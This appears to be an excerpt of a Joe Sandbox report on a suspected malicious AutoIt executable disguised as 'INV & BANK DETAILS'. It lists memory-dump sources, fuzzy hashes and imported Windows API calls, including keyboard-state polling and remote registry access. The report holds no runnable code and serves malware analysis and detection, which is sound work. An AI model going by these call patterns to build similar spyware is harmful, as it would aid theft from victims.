                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                • String ID: NULL Pointer assignment
                                • API String ID: 440038798-2785691316
                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                APIs
                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                • _wcslen.LIBCMT ref: 004610A3
                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                • GetWindowRect.USER32(?,?), ref: 00461248
                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                • String ID: ThumbnailClass
                                • API String ID: 4136854206-1241985126
                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                APIs
                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                • GetClientRect.USER32(?,?), ref: 00471A1A
                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                • DestroyIcon.USER32(?), ref: 00471AF4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                • String ID: 2
                                • API String ID: 1331449709-450215437
                                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                • __swprintf.LIBCMT ref: 00460915
                                • __swprintf.LIBCMT ref: 0046092D
                                • _wprintf.LIBCMT ref: 004609E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                • API String ID: 3054410614-2561132961
                                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                APIs
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                • API String ID: 600699880-22481851
                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: DestroyWindow
                                • String ID: static
                                • API String ID: 3375834691-2160076837
                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$DriveType
                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                • API String ID: 2907320926-3566645568
                                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                APIs
                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                • DeleteObject.GDI32(00630000), ref: 00470A04
                                • DestroyIcon.USER32(006C0061), ref: 00470A1C
                                • DeleteObject.GDI32(DE60F879), ref: 00470A34
                                • DestroyWindow.USER32(0041005C), ref: 00470A4C
                                • DestroyIcon.USER32(?), ref: 00470A73
                                • DestroyIcon.USER32(?), ref: 00470A81
                                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                • String ID:
                                • API String ID: 1237572874-0
                                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                APIs
                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                • VariantClear.OLEAUT32(?), ref: 00479489
                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                • String ID:
                                • API String ID: 2706829360-0
                                • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                APIs
                                • GetKeyboardState.USER32(?), ref: 0044480E
                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                • GetKeyState.USER32(00000011), ref: 00444903
                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                • GetKeyState.USER32(00000012), ref: 0044492D
                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                • GetKeyState.USER32(0000005B), ref: 00444958
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                • String ID:
                                • API String ID: 3413494760-0
                                • Opcode ID: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                • Opcode Fuzzy Hash: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                • String ID: AU3_FreeVar
                                • API String ID: 2634073740-771828931
                                • Opcode ID: 02bdb148293147b792730c67b1546b00a60a675fa046de8965836ce0cfc2e6fd
                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                • Opcode Fuzzy Hash: 02bdb148293147b792730c67b1546b00a60a675fa046de8965836ce0cfc2e6fd
                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                APIs
                                • CoInitialize.OLE32 ref: 0046C63A
                                • CoUninitialize.OLE32 ref: 0046C645
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                • API String ID: 2294789929-1287834457
                                • Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                • Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                APIs
                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                • ReleaseCapture.USER32 ref: 0047116F
                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                • API String ID: 2483343779-2107944366
                                • Opcode ID: 37b0ef4ead8948c8a0d7f11259567122c9bd2b7a701ccd80914a9ed7fb95c3bd
                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                • Opcode Fuzzy Hash: 37b0ef4ead8948c8a0d7f11259567122c9bd2b7a701ccd80914a9ed7fb95c3bd
                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                APIs
                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                • _wcslen.LIBCMT ref: 00450720
                                • _wcscat.LIBCMT ref: 00450733
                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
